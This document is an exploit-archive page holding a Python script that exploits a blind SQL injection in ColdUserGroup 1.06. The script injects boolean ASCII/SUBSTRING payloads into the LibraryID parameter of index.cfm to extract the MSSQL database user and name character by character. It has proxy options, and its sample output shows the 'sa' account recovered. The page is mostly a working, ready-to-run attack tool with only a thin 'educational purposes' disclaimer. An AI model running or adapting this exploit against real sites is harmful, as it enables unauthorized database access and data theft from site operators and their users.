ColdUserGroup 1.06 Blind SQL Injection

ColdUserGroup 1.06 Blind SQL Injection: Posted Sep 8, 2010; Authored by mr_me; ColdUserGroup version 1.06 suffers from a remote blind SQL injection vulnerability.; tags | exploit, remote, sql injection; MD5 | 26ec4853bc4e172c9e51243a3094684a; Download | Favorite | Comments (0)

ColdUserGroup 1.06 Blind SQL Injection

#!/usr/bin/python
# ColdGen - coldusergroup v1.06 0day Remote Blind SQL Injection Exploit
# Vendor: http://www.coldgen.com/
# Found by: mr_me
# ----------------------------------------------->
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# ----------------------------------------------->
# The vulnerabilities:
# ===================
# - Blind SQL Injection in the index.cfm using parameters: ArticleID & LibraryID
# - XSS in the search
#
# This tool assumes the target has a MSSQL backend.
# ./ColdUsrGrp0day.py -p localhost:8080 -s "Author:" -t localhost:8500 -d /coldusrgrp/
#
#   | ----------------------------------------------------------------- |
#   |  -= ColdUserGroup v1.6 0day Remote Blind SQL Injection Exploit =- |
#   | -------------------[ by mr_me - net-ninja.net ]------------------ |
#
# (+) Exploiting target @: http://localhost:8500/coldusrgrp/
# (+) Using string 'Author:' for the true page
# (+) This will take time, have patience..
#
# (+) Testing Proxy...
# (+) Proxy @ localhost:8080
# (+) Building Handler..
#
# (!) Getting database user: sa
# (!) Getting database name: coldusergroup
 
import sys, urllib, re
from optparse import OptionParser
 
usage = "./%prog [<options>] -s [true string] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -s 'Author:' -t localhost:8500 -d /coldusrgrp/"
 
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
                  help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
                  help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="directory",
                  help="Directory path to the CMS")
parser.add_option("-s", type="string", action="store", dest="trueStr",
                  help="String that is on the 'true' page")
(options, args) = parser.parse_args()
 
def banner():
    print "\n\t| ----------------------------------------------------------------- |"
    print "\t|  -= ColdUserGroup v1.6 0day Remote Blind SQL Injection Exploit =- |"
    print "\t| -------------------[ by mr_me - net-ninja.net ]------------------ |\n"
 
if len(sys.argv) < 5:
    banner()
    parser.print_help()
    sys.exit(1)
 
def setTargetHTTP():
    if options.target[0:7] != 'http://':
        options.target = "http://" + options.target
    return options.target
     
def getProxy():
    try:
        proxy = {'http': "http://"+options.proxy}
        opener = urllib.FancyURLopener(proxy)
    except(socket.timeout):
        print "\n(-) Proxy Timed Out"
        sys.exit(1)
    except(),msg:
        print "\n(-) Proxy Failed"
        sys.exit(1)
    return opener
     
def getRequest(exploit):
    if options.proxy:
        try:
            options.target = setTargetHTTP()
            opener = getProxy()
            check = opener.open(options.target+options.directory+exploit).read()
        except urllib.error.HTTPError, error:
            check = error.read()
        except socket.error:
            print "(-) Proxy connection failed"
            sys.exit(1)
    else:
        try:
            check = urllib.urlopen(options.target+options.directory+exploit).read()
        except urllib.error.HTTPError, error:
            check = error.read()
        except urllib.error.URLError:
            print "(-) Target connection failed, check your address"
            sys.exit(1)
    return check
 
basicInfo = {'user':'user_name(0)', 'name':'db_name(0)'}
 
def getBasicInfo(info, x):
    for i in range(32,126):
        request = ("index.cfm?actcfug=LibraryView&LibraryID=209+AND+ISNULL"
        "(ASCII(SUBSTRING(CAST((SELECT+LOWER("+info+"))AS+varchar(8000)),"+str(x)+",1)),0)="+str(i))
        result = getRequest(request)
        if re.search(options.trueStr,result):
            x = x+1
            sys.stdout.write(chr(i))
            getBasicInfo(info, x)
     
if __name__ == "__main__":
    x = 1
    banner()
    options.target = setTargetHTTP()
    print "(+) Exploiting target @: %s" % (options.target+options.directory)
    print "(+) Using string '%s' for the true page" % (options.trueStr)
    print "(+) This will take time, have patience.."
    if options.proxy:
        print "\n(+) Testing Proxy..."
        print "(+) Proxy @ %s" % (options.proxy)
        print "(+) Building Handler.."
 
    for key in basicInfo:
        sys.stdout.write("\n(!) Getting database " + key + ": ")
        getBasicInfo(basicInfo[key], x)

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Heine Pedersen 29 files
Torben Jensen 29 files
Farbod Mahini 26 files
Ubuntu 26 files
Red Hat 25 files
Debian 24 files
Mandriva 17 files
sinn3r 12 files
the_cyber_nuxbie 11 files
L3b-r1'z 10 files

File Archives

Systems

AIX (352)
Apple (963)
BSD (302)
Cisco (1,248)
Debian (3,803)
Fedora (1,660)
FreeBSD (1,024)
Gentoo (2,468)
HPUX (685)
iPhone (95)
IRIX (217)
Juniper (60)
Linux (20,653)
Mac OS X (415)
Mandriva (2,205)
NetBSD (235)
OpenBSD (414)
RedHat (2,431)
Slackware (378)
Solaris (1,472)
SUSE (1,228)
Ubuntu (2,729)
UNIX (6,852)
UnixWare (148)
Windows (4,019)
Other

ColdUserGroup 1.06 Blind SQL Injection

ColdUserGroup 1.06 Blind SQL Injection

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ColdUserGroup 1.06 Blind SQL Injection

Share This

ColdUserGroup 1.06 Blind SQL Injection

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems